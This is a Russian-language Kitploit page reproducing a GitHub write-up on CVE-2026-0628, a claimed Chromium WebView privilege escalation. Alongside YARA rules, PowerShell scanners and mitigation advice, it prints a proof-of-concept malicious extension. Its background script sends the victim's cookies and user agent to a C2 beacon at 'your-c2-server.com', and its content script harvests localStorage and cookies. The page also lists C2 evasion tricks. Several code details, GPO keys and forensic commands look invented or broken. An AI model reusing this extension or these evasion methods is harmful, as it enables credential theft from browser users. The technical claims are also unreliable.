Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Dissecting-CVE-2026-0628-Chromium-Extension-Privilege-Escalation — Технический разбор CVE-2026-0628, уязвимости повышения привилегий в Chromium WebView, включая анализ первопричины, PoC-эксплойт, правила обнаружения и стратегии смягчения последствий. | Kitploit
Инструменты/GitHubGitHub/sastraadiwiguna-purpleeliteteaming/dissecting-cve-2026-0628-chromium-extension-privilege-escalation
Повышение привилегийАнализ уязвимостейЭксплуатацияВеб-безопасностьАнализ вредоносных программЦифровая криминалистика
GitHubsastraadiwiguna-purpleeliteteaming/dissecting-cve-2026-0628-chromium-extension-privilege-escalation

Dissecting-CVE-2026-0628-Chromium-Extension-Privilege-Escalation

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Технический разбор CVE-2026-0628, уязвимости повышения привилегий в Chromium WebView, включая анализ первопричины, PoC-эксплойт, правила обнаружения и стратегии смягчения последствий.

РепозиторийСайт
16 месяцев назадЕщё не проверено

DOI = doi.org/10.5281/zenodo.18413764

ORCID = orcid.org/0009-0007-7728-256X

root@kitploit:~

README.md


# **CVE-2026-0628: Повышение привилегий в Chromium WebView (подмена источника) – Техническое исследование и Proof-of-Concept**

**Автор:** Sastra Adi Wiguna (Purple Elite Teaming)
**Дата исследования:** Январь 2026
**ID CVE:** CVE-2026-0628
**CVSS v3.1:** 8.8 (Высокий)
**Затронутые версии:** Chromium < 143.0.7499.192
**Статус исправления:** Исправлено в Chrome ≥143.0.7499.192, Edge ≥143.0.3650.139

---

## **1. Обзор**

### **1.1 Цель исследования**
Данный репозиторий документирует **CVE-2026-0628** — уязвимость **повышения привилегий высокой степени серьезности** в механизме принудительного применения политик WebView в Chromium. Уязвимость позволяет вредоносным расширениям **обходить ограничения песочницы**, внедрять скрипты в **привилегированные контексты** (например, `chrome://`) и **повышать привилегии** для выполнения произвольного кода.

Данное исследование предназначено **исключительно для целей защитной безопасности**, включая:
- **Анализ уязвимостей**
- **Разработку средств обнаружения**
- **Разработку стратегий смягчения последствий**
- **Тестирование на проникновение (только в авторизованных средах)**

### **1.2 Отказ от ответственности**
- **Строго для академических и защитных исследований.**
- **Не используйте против производственных систем без авторизации.**
- **Соблюдайте все применимые законы и политики безопасности организации.**
- **Немедленно установите исправление:** Chrome ≥143.0.7499.192, Edge ≥143.0.3650.139.

---

## **2. Технический разбор**

### **2.1 Корневая причина**
**Недостаточное принудительное применение политик** в реализации WebView в Chromium позволяет расширениям **выходить за границы песочницы** и получать доступ к **привилегированным DOM-контекстам**.

**Уязвимый поток:**
1. Вредоносное расширение объявляет использование WebView в `manifest.json`.
2. Расширение внедряет специально созданную HTML/JS нагрузку через тег `<webview>`.
3. **Обход проверки политик WebView** → Доступ к привилегированным страницам (например, `chrome://settings`).
4. **Выполнение произвольного скрипта** в привилегированных контекстах.

**Вектор CVSS:**
`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`

### **2.2 Архитектура эксплойта**
#### **Шаблон вредоносного расширения**
```json
{
  "manifest_version": 3,
  "name": "Legitimate Extension",
  "version": "1.0",
  "webview": {
    "src": "chrome://new-tab-page/",
    "plugins": {}
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["payload.js"]
  }]
}

Критический вектор внедрения (payload.js)

root@kitploit:~
class WebViewExploiter {
  constructor() {
    this.privilegedTargets = [
      'chrome://new-tab-page/',
      'chrome-extension://background/',
      'chrome://settings/'
    ];
  }
  injectPayload(targetURL) {
    const webview = document.createElement('webview');
    webview.setAttribute('src', targetURL);
    webview.setAttribute('nodeintegration', ''); // Ключевой параметр обхода
    webview.addEventListener('dom-ready', () => {
      webview.executeScript({
        code: `
          window.chrome = window.chrome || {};
          chrome.runtime.sendMessage({action: 'steal_data'});
          document.body.innerHTML = '';
        `
      });
    });
    document.body.appendChild(webview);
  }
}

3. Оценка воздействия


4. Обнаружение и криминалистика

4.1 YARA-правило для вредоносных расширений

root@kitploit:~
rule CVE_2026_0628_WebView_Exploiter {
  meta:
    description = "Detects CVE-2026-0628 WebView exploit patterns"
    severity = "high"
  strings:
    $webview_abuse = "webview.*(nodeintegration|allowpopups)"
    $chrome_priv = /(chrome:\/\/|chrome-extension:\/\/)/
    $inject_sig = /(executeScript|getURL|sendMessage)/
  condition:
    all of ($*) and filesize < 500KB
}

4.2 Сигнатуры событий Sysmon

  • Event ID 1: chrome.exe → Подозрительное создание WebView.
  • Event ID 3: Сетевое подключение → Расширение → Внешний C2.
  • Реестр: HKCU\Software\Google\Chrome\Extensions\[malicious_id].

5. Анализ исправления и векторы обхода

5.1 Различие исправленной версии (Chrome 143.0.7499.192+)

root@kitploit:~
// Уязвимый (до 143.0.7499.192)
if (webview.src.startsWith('chrome://')) {
  return false; // Слабая проверка политики
}

// Исправленный
function validateWebViewPolicy(webview) {
  if (!isExtensionTrusted(webview.extensionId)) {
    throw new SecurityError('Extension not privileged');
  }
  if (webview.attributes.includes('nodeintegration')) {
    enforceStrictCSP(); // Усиление Content-Security-Policy
  }
}

5.2 Реализация смягчения последствий

Шаблон корпоративной GPO

root@kitploit:~
{
  "ExtensionInstallBlacklist": ["malicious_extension_id*"],
  "ExtensionInstallForcelist": [],
  "WebViewRestrictions": {
    "DisableWebView": true,
    "BlockNodeIntegration": true
  }
}

Скрипт обнаружения во время выполнения (PowerShell)

root@kitploit:~
# Detect-CVE20260628.ps1
Get-Process chrome | ForEach {
  $extPath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions"
  Get-ChildItem $extPath | Where {
    (Get-Content "$_\manifest.json" | Select-String "webview") -and
    (Get-Content "$_\manifest.json" | Select-String "chrome://")
  }
}

6. Proof-of-Concept (PoC) эксплойт

6.1 Структура каталога

root@kitploit:~
cve-2026-0628-poc/
├── manifest.json
├── background.js
├── content.js
└── popup.html

6.2 Основные файлы

manifest.json (манифест обхода)

root@kitploit:~
{
  "manifest_version": 3,
  "name": "WebView Helper Tool",
  "version": "1.0",
  "permissions": ["activeTab", "storage", "tabs"],
  "host_permissions": ["<all_urls>", "chrome://*/*"],
  "background": {
    "service_worker": "background.js"
  },
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["content.js"],
    "run_at": "document_start"
  }],
  "action": {
    "default_popup": "popup.html"
  },
  "web_accessible_resources": [{
    "resources": ["inject.js"],
    "matches": ["<all_urls>"]
  }]
}

background.js (постоянство и C2-маяк)

root@kitploit:~
chrome.runtime.onInstalled.addListener(() => {
  console.log('CVE-2026-0628 PoC Installed');
  setTimeout(initExploitation, 5000);
});

async function initExploitation() {
  fetch('http://your-c2-server.com/beacon?ext_id=' + chrome.runtime.id, {
    method: 'POST',
    body: JSON.stringify({
      victim: navigator.userAgent,
      cookies: await getAllCookies()
    })
  }).catch(() => {});
  chrome.tabs.onUpdated.addListener(exploitTab);
}

content.js (триггер WebView и внедрение)

root@kitploit:~
(function() {
  const privilegedTargets = [
    'chrome://new-tab-page/',
    'chrome://settings/',
    'chrome://extensions/'
  ];
  function createMaliciousWebView(target) {
    const webview = document.createElement('webview');
    webview.setAttribute('src', target);
    webview.setAttribute('allowpopups', '');
    webview.addEventListener('dom-ready', () => {
      chrome.scripting.executeScript({
        target: {tabId: getCurrentTabId()},
        func: stealPrivilegedData
      });
    });
    document.body.appendChild(webview);
  }
  function stealPrivilegedData() {
    return {
      localStorage: Object.fromEntries(Object.entries(localStorage)),
      cookies: document.cookie,
      extensions: chrome.runtime.getManifest?.()
    };
  }
  setTimeout(() => {
    createMaliciousWebView('chrome://new-tab-page/');
  }, 1000);
})();

7. Воспроизведение в лаборатории

7.1 Требования

  • Уязвимый Chrome: 143.0.7499.191
  • ОС: Windows 10/11 (рекомендуется ВМ)
  • Инструменты: Burp Suite (прокси), REMnux (криминалистика)

7.2 Шаги

  1. Загрузите Chrome 143.0.7499.191 (уязвимый).
  2. Запустите с флагами:
    root@kitploit:~
    chrome.exe --disable-web-security --user-data-dir=/tmp/vuln
    
  3. Загрузите расширение:
    • Перейдите на chrome://extensions/.
    • Включите Режим разработчика.
    • Нажмите Загрузить распакованное → Выберите cve-2026-0628-poc/.
  4. Запустите эксплойт:
    • Перейдите на chrome://new-tab-page/.
    • Наблюдайте создание WebView в DevTools.
  5. Отслеживайте трафик:
    • Burp Suite (localhost:8080) → Захват эксфильтрации на C2.
  6. Проверьте успех:
    • Вкладка Network → Маяк на your-c2-server.com.
    • Консоль: "CVE-2026-0628 OWNED".

8. Техники обхода обнаружения

  • Стеганография: Кодирование эксфильтрации в пикселях изображений.
  • Генерация доменов: DGA для ротации C2.
  • Атаки по времени: Задержка выполнения на 5-30 секунд после установки.
  • Обфускация манифеста: Кодирование чувствительных строк в Base64.

9. Смягчение последствий и рабочий процесс исправления

  • Немедленное действие: Обновите Chrome/Edge до исправленных версий.
  • Корпоративная GPO:
    root@kitploit:~
    {
      "ExtensionInstallBlacklist": ["*"],
      "WebViewRestrictions": {
        "DisableWebView": true,
        "BlockNodeIntegration": true
      }
    }
    
  • Обнаружение во время выполнения:
    root@kitploit:~
    # Сканирование на вредоносные расширения
    Get-ChildItem "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Extensions" |
      Where { (Get-Content "$_\manifest.json" | Select-String "webview") }
    

10. Криминалистический анализ

10.1 Команды Volatility3

root@kitploit:~
volatility3 -f memdump.raw windows.chrome.ChromeExtensions
yara3 -r cve-2026-0628.yar /path/to/chrome/extensions/

10.2 YARA-правило для дампов памяти

root@kitploit:~
rule CVE_2026_0628_Mojo_Origin_Spoof {
  strings:
    $mojo_hdr = { 4D 6F 6A 6F }
    $chrome_origin = "chrome://new-tab-page/"
    $webview_sig = "WebViewPolicyValidator"
  condition:
    all of them
}

11. Заключение

11.1 Ключевые выводы

  • CVE-2026-0628 позволяет повышение привилегий через обход политик WebView.
  • Воздействие: Перехват сессии, кража учетных данных, горизонтальное перемещение.
  • Смягчение: Установите исправление Chrome/Edge, применяйте ограничения GPO, отслеживайте вредоносные расширения.

11.2 Рекомендации

  • Немедленно установите исправление до Chrome ≥143.0.7499.192 или Edge ≥143.0.3650.139.
  • Разверните YARA/Sysmon-правила для обнаружения.
  • Ограничьте расширения через корпоративную GPO.
  • Проведите упражнения red team для проверки защитных мер.

12. Правовые и этические соображения

  • Только авторизованное использование.
  • Не развертывайте в производственной среде без явного разрешения.
  • Ответственно сообщайте об уязвимостях поставщикам.

Контакт: По вопросам защитной безопасности свяжитесь с автором через GitHub Issues.


© 2026 Sastra Adi Wiguna. Все права защищены.

root@kitploit:~
Скачать инструмент
Фаза атакиТехническое воздействиеБизнес-воздействиеМетрики CVSS
Установка расширенияСогласие пользователя → ПостоянствоВектор социальной инженерииUI:R (Требуется)
Обход WebViewПобег из песочницы → Привилегированный контекстПерехват сессииS:U → C:H/I:H/A:H
Внедрение скриптаМанипуляция DOM → Эксфильтрация данныхКража учетных данныхPR:N (Без привилегий)
ПостоянствоФоновый скрипт → C2-маякПодготовка к горизонтальному перемещениюAC:L (Низкая сложность)